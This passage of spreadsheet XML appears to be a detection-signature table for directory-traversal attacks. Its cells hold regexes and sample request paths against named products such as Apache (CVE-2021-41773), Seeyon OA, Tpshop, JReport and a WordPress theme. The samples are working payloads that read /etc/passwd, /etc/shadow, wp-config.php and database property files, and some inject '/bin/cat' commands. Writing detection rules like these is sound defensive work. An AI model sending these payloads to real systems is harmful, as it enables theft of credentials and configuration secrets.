passwd//\&amp;apos;\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./%2A\\\\\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd\\\\/\.\./boot\.ini|/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00\.html\\\\%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd|//%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%00|/%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%\ \ \ \ 25%5c\.\.%25%5c\.\.%00\\\\%5c\.\.%5c\.\.%5cetc/passwd|/%00\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00\.jpg|%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%00\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd\\\\\./\./\./\./\./\./\./\./\./\./etc/shadow|/static/\.\.%5cetc/passwd\\\\%5c\.\.%5cetc/passwd\\\\%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/shadow\^\^\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/shadow|/%0a/bin/cat%20/etc/shadow\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/hosts\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd\\\\%5cetc/passwd|/%00/etc/shadow%00\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/hosts%00|/static/\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\/\.\./boot\.ini|/static/\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd|/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow\\\\%5cetc/passwd|/static/\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd|/%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%\	25%5c\.\.%25%5c\.\.%00\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00\.html\\\\%5c\.\.%5c\.\.%5cetc/passwd|/static/\.\.%5c\.\.%5cetc/passwd\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd\\\\\./\./\./\./\./\./\./\./\./\./etc/shadow\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/shadow%00|/%00/etc/shadow%00\\\\%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd|/static/\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd|/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd\\\\\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd|/%00/etc/passwd%00\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/hosts\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./%2A\\\\%5c\.\.%5cetc/passwd|/%00\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00\.jpg\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/shadow\^\^|/%0a/bin/cat%20/etc/passwd\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/shadow|//\&amp;apos;/bin/cat%20/etc/passwd//\&amp;apos;\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/shadow|/image\?filename=\.\./\.\./\.\./etc/passwd\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/hosts%00|/static/\.\.%5cetc/passwd\\\\\./\./\./\./\./\./\./\./\./\./etc/passwd\\\\%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./etc/shadow\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd\^\^\\\\%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./etc/passwd|/static/\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00|/%0a/bin/cat%20/etc/passwd\\\\%5cetc/passwd|/%00/etc/shadow%00\\\\%5c\.\.%5c\.\.%5cetc/passwd|%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%00\\\\/\.\./boot\.ini|/static/\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./etc/shadow|/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./%2A\\\\%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd|/static/\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\\./\./\./\./\./\./\./\./\./\./etc/shadow|/static/\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./etc/passwd\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd|/%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%\ \ \ \ 25%5c\.\.%25%5c\.\.%00\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/hosts\\\\%5c\.\.%5cetc/passwd|/%0a/bin/cat%20/etc/shadow\\\\%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/shadow%00|/static/\.\.%5c\.\.%5cetc/passwd\\\\\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/shadow\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00\.html\\\\%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd|/%00/etc/passwd%00\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd\^\^\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00\.jpg|/%00\.\./\.\./\.\./\.\./\.\./\.\./etc/shadow\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/shadow\^\^|/image\?filename=\.\./\.\./\.\./etc/passwd\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/shadow|/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00|/static/\.\.%5cetc/passwd\\\\\./\./\./\./\./\./\./\./\./\./etc/passwd|/%00\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd|/static/\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/hosts%00|/static/\.\.%5c\.\.%5cetc/passwd\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00\.jpg|%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%00\\\\\./\./\./\./\./\./\./\./\./\./etc/shadow\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./%2A\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/shadow\\\\%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./etc/passwd\\\\%5c\.\.%5cetc/passwd|/%00/etc/shadow%00\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/shadow\^\^\\\\/\.\./boot\.ini\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/hosts\\\\%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd|//%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%00\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd|/%00\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/hosts%00\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd|/static/\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/shadow|/static/\.\.%5cetc/passwd|/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd\^\^|/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow\\\\%5c\.\.%5c\.\.%5cetc/passwd\\\\%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd|/%00\.\./\.\./\.\./\.\./\.\./\.\./etc/shadow\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00\.html\\\\\./\./\./\./\./\./\./\./\./\./etc/passwd\\\\%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./etc/shadow\\\\%5cetc/passwd\\\\\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/shadow%00).*</t>
  </si>
  <si>
    <t>/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow/image?filename=../../../etc/passwd\\/../../../../../../../../../etc/passwd\\../../../../../../../../../../etc/passwd|/%0a/bin/cat%20/etc/shadow|/static/..%5c..%5c..%5cetc/passwd|%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00|/static/..%5cetc/passwd\\/../boot.ini|//&amp;apos;/bin/cat%20/etc/passwd//&amp;apos;|/%00/etc/passwd%00|/%00../../../../../../etc/passwd\\././././././././././etc/shadow\\%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd|/%0a/bin/cat%20/etc/passwd\\%5c..%5c..%5c..%5c..%5cetc/passwd\\/../../../../../../../../../../../etc/hosts|//%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00\\/../../../../../../../../../etc/shadow^^\\%5c..%5c..%5cetc/passwd\\%5cetc/passwd\\/../../../../../../../../../../../etc/passwd\\/../../../../../../../../../../../etc/passwd%00\\/../../../../../../../../../../../etc/hosts%00\\%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd\\%5c..%5c..%5c..%5cetc/passwd\\/../../../../../../../../../../../etc/shadow|/static/..%5c..%5c..%5c..%5c..%5cetc/passwd|/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd|/%00/etc/shadow%00\\/../../../../../../../../../etc/passwd^^\\%5c..%5c..%5c..%5c..%5c..%5cetc/passwd\\/../../../../../../../../../etc/shadow|/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow\\/../../../../../../../../../../etc/passwd%00.jpg|/%00../../../../../../etc/shadow|/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd\\././././././././././etc/passwd|/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd|/static/..%5c..%5c..%5c..%5cetc/passwd\\/../../../../../../../%2A\\%5c..%5cetc/passwd|/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd\\%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow\\%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd|/image?filename=../../../etc/passwd|/static/..%5c..%5cetc/passwd|/static/..%5c..%5c..%5c..%5c..%5cetc/passwd\\/../../../../../../../../../../../etc/shadow%00\\/../../../../../../../../../etc/passwd^^\\%5c..%5c..%5c..%5cetc/passwd\\%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd\\/../../../../../../../../../etc/shadow\\././././././././././etc/passwd|/%0a/bin/cat%20/etc/passwd|//&amp;apos;/bin/cat%20/etc/passwd//&amp;apos;\\/../../../../../../../%2A\\../../../../../../../../../../etc/passwd\\/../boot.ini|/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow\\/../../../../../../../../../../etc/passwd%00.html\\%5c..%5c..%5c..%5c..%5c..%5cetc/passwd|//%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00|/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%    25%5c..%25%5c..%00\\%5c..%5c..%5cetc/passwd|/%00../../../../../../etc/passwd\\/../../../../../../../../../../../etc/passwd%00\\/../../../../../../../../../../etc/passwd%00.jpg|%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00\\/../../../../../../../../../../../etc/passwd\\././././././././././etc/shadow|/static/..%5cetc/passwd\\%5c..%5cetc/passwd\\%5c..%5c..%5c..%5c..%5cetc/passwd\\/../../../../../../../../../etc/shadow^^\\/../../../../../../../../../../../etc/shadow|/%0a/bin/cat%20/etc/shadow\\/../../../../../../../../../../../etc/hosts\\/../../../../../../../../../etc/passwd\\%5cetc/passwd|/%00/etc/shadow%00\\/../../../../../../../../../../../etc/hosts%00|/static/..%5c..%5c..%5c..%5cetc/passwd\/../boot.ini|/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd|/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow\\%5cetc/passwd|/static/..%5c..%5c..%5c..%5cetc/passwd|/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%	25%5c..%25%5c..%00\\/../../../../../../../../../../etc/passwd%00.html\\%5c..%5c..%5cetc/passwd|/static/..%5c..%5cetc/passwd\\/../../../../../../../../../../../etc/passwd\\././././././././././etc/shadow\\/../../../../../../../../../../../etc/shadow%00|/%00/etc/shadow%00\\%5c..%5c..%5c..%5c..%5c..%5cetc/passwd|/static/..%5c..%5c..%5c..%5c..%5cetc/passwd\\%5c..%5c..%5c..%5cetc/passwd\\%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd\\%5c..%5c..%5c..%5c..%5cetc/passwd\\/../../../../../../../../../etc/passwd|/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd\\../../../../../../../../../../etc/passwd|/%00/etc/passwd%00\\/../../../../../../../../../../../etc/hosts\\/../../../../../../../%2A\\%5c..%5cetc/passwd|/%00../../../../../../etc/passwd\\/../../../../../../../../../../etc/passwd%00.jpg\\/../../../../../../../../../etc/shadow^^|/%0a/bin/cat%20/etc/passwd\\/../../../../../../../../../etc/shadow|//&amp;apos;/bin/cat%20/etc/passwd//&amp;apos;\\/../../../../../../../../../../../etc/shadow|/image?filename=../../../etc/passwd\\/../../../../../../../../../../../etc/hosts%00|/static/..%5cetc/passwd\\././././././././././etc/passwd\\%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow\\/../../../../../../../../../etc/passwd^^\\%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd|/static/..%5c..%5c..%5cetc/passwd\\/../../../../../../../../../../../etc/passwd%00|/%0a/bin/cat%20/etc/passwd\\%5cetc/passwd|/%00/etc/shadow%00\\%5c..%5c..%5cetc/passwd|%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00\\/../boot.ini|/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd\\%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow|/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow\\/../../../../../../../%2A\\%5c..%5c..%5c..%5c..%5cetc/passwd\\%5c..%5c..%5c..%5cetc/passwd|/static/..%5c..%5c..%5c..%5c..%5cetc/passwd\\././././././././././etc/shadow|/static/..%5c..%5c..%5cetc/passwd\\%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd\\/../../../../../../../../../etc/passwd|/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%    25%5c..%25%5c..%00\\/../../../../../../../../../../../etc/hosts\\%5c..%5cetc/passwd|/%0a/bin/cat%20/etc/shadow\\%5c..%5c..%5c..%5c..%5c..%5cetc/passwd\\/../../../../../../../../../../../etc/shadow%00|/static/..%5c..%5cetc/passwd\\../../../../../../../../../../etc/passwd\\/../../../../../../../../../etc/shadow\\/../../../../../../../../../../etc/passwd%00.html\\%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd|/%00/etc/passwd%00\\/../../../../../../../../../etc/passwd^^\\/../../../../../../../../../../etc/passwd%00.jpg|/%00../../../../../../etc/shadow\\/../../../../../../../../../etc/shadow^^|/image?filename=../../../etc/passwd\\/../../../../../../../../../../../etc/passwd\\/../../../../../../../../../../../etc/shadow|/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd\\/../../../../../../../../../../../etc/passwd%00|/static/..%5cetc/passwd\\././././././././././etc/passwd|/%00../../../../../../etc/passwd|/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd\\/../../../../../../../../../../../etc/hosts%00|/static/..%5c..%5cetc/passwd\\/../../../../../../../../../../etc/passwd%00.jpg|%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00\\././././././././././etc/shadow\\/../../../../../../../%2A\\/../../../../../../../../../etc/shadow\\%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd\\%5c..%5cetc/passwd|/%00/etc/shadow%00\\/../../../../../../../../../etc/shadow^^\\/../boot.ini\\/../../../../../../../../../../../etc/hosts\\%5c..%5c..%5c..%5c..%5cetc/passwd\\%5c..%5c..%5c..%5c..%5c..%5cetc/passwd\\%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd|//%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00\\/../../../../../../../../../../../etc/passwd|/%00../../../../../../etc/passwd\\/../../../../../../../../../../../etc/hosts%00\\/../../../../../../../../../etc/passwd|/static/..%5c..%5c..%5c..%5cetc/passwd\\/../../../../../../../../../../../etc/passwd%00\\/../../../../../../../../../../../etc/shadow|/static/..%5cetc/passwd|/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd\\/../../../../../../../../../etc/passwd^^|/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow\\%5c..%5c..%5cetc/passwd\\%5c..%5c..%5c..%5cetc/passwd|/%00../../../../../../etc/shadow\\/../../../../../../../../../../etc/passwd%00.html\\././././././././././etc/passwd\\%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow\\%5cetc/passwd\\../../../../../../../../../../etc/passwd\\/../../../../../../../../../../../etc/shadow%00</t>
  </si>
  <si>
    <t>Pmb_目录遍历</t>
  </si>
  <si>
    <t>致远OA_目录遍历</t>
  </si>
  <si>
    <t>.*?(?:/seeyonreport/ReportServer\?op=fs_remote_design\&amp;cmd=design_list_file\&amp;file_path=\.\./\&amp;currentUserName=admin\&amp;currentUserId=1\&amp;isWebReport=true).*</t>
  </si>
  <si>
    <t>/seeyonreport/ReportServer?op=fs_remote_design&amp;cmd=design_list_file&amp;file_path=../&amp;currentUserName=admin&amp;currentUserId=1&amp;isWebReport=true</t>
  </si>
  <si>
    <t>Tpshop</t>
  </si>
  <si>
    <t>Tpshop_目录遍历</t>
  </si>
  <si>
    <t>.*?(?:/index\.php/Home/uploadify/fileList\?type=\.\+\&amp;path=\.\./\.\./\.\./).*</t>
  </si>
  <si>
    <t>CVE-2021-41773</t>
  </si>
  <si>
    <t>Apache_目录遍历_CVE-2021-41773</t>
  </si>
  <si>
    <t>.*?(?:/icons/\.%2e/\.%2e/\.%2e/\.%2e/\.%2e/\.%2e/\.%2e/etc/passwd|/CGI\-bin/\.%2e/\.%2e/\.%2e/\.%2e/\.%2e/\.%2e/\.%2e/etc/passwd).*</t>
  </si>
  <si>
    <t>/icons/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd|/CGI-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd</t>
  </si>
  <si>
    <t>EcOA Building Automation System</t>
  </si>
  <si>
    <t>EcOA Building Automation System_目录遍历</t>
  </si>
  <si>
    <t>.*?(?:/fmangersub\?cpath=\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/fmangersub?cpath=../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Flyrise Fe</t>
  </si>
  <si>
    <t>Flyrise Fe_目录遍历</t>
  </si>
  <si>
    <t>.*?(?:/servlet/ShowImageServlet\?imagePath=\.\./web/fe\.war/WEB\-INF/classes/jdbc\.properties\&amp;print).*</t>
  </si>
  <si>
    <t>/servlet/ShowImageServlet?imagePath=../web/fe.war/WEB-INF/classes/jdbc.properties&amp;print</t>
  </si>
  <si>
    <t>Javo Spot Premium Theme</t>
  </si>
  <si>
    <t>Javo Spot Premium Theme_目录遍历</t>
  </si>
  <si>
    <t>.*?(?:/wp\-admin/admin\-ajax\.php\?jvfrm_spot_get_json\&amp;fn=\.\./\.\./wp\-config\.php\&amp;callback=jQuery|/wp\-admin/admin\-ajax\.php\?\ jvfrm_spot_get_json\&amp;fn=\.\./\.\./wp\-config\.php\&amp;callback=jQuery).*</t>
  </si>
  <si>
    <t>/wp-admin/admin-ajax.php?jvfrm_spot_get_json&amp;fn=../../wp-config.php&amp;callback=jQuery|/wp-admin/admin-ajax.php? jvfrm_spot_get_json&amp;fn=../../wp-config.php&amp;callback=jQuery</t>
  </si>
  <si>
    <t>Jinfornet Jreport</t>
  </si>
  <si>
    <t>Jinfornet Jreport_目录遍历</t>
  </si>
  <si>
    <t>.*?(?:/jreport/sendfile/help/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Joomla_目录遍历</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_fabrik\&amp;task=plugin\.pluginAjax\&amp;plugin=image\&amp;g=element\&amp;method=onAjax_files\&amp;folder=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./tmp/).*</t>
  </si>
  <si>
    <t>/index.php?option=com_fabrik&amp;task=plugin.pluginAjax&amp;plugin=image&amp;g=element&amp;method=onAjax_files&amp;folder=../../../../../../../../../../../../../../../tmp/</t>
  </si>
  <si>
    <t>Karel IP Phone的Web管理界面</t>
  </si>
  <si>
    <t>Karel IP Phone的Web管理界面_目录遍历</t>
  </si>
  <si>
    <t>.*?(?:/CGI\-bin/CGIServer\.exx\?page=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/CGI-bin/CGIServer.exx?page=../../../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Liveobs</t>
  </si>
  <si>
    <t>Liveobs_目录遍历</t>
  </si>
  <si>
    <t>Management Console_目录遍历</t>
  </si>
  <si>
    <t>.*?(?:/Electron/download/windows/\\windows\\win\.ini|/Electron/download/windows/\.\.\\\.\.\\\.\.\\Http\\webroot\\config\.json).*</t>
  </si>
  <si>
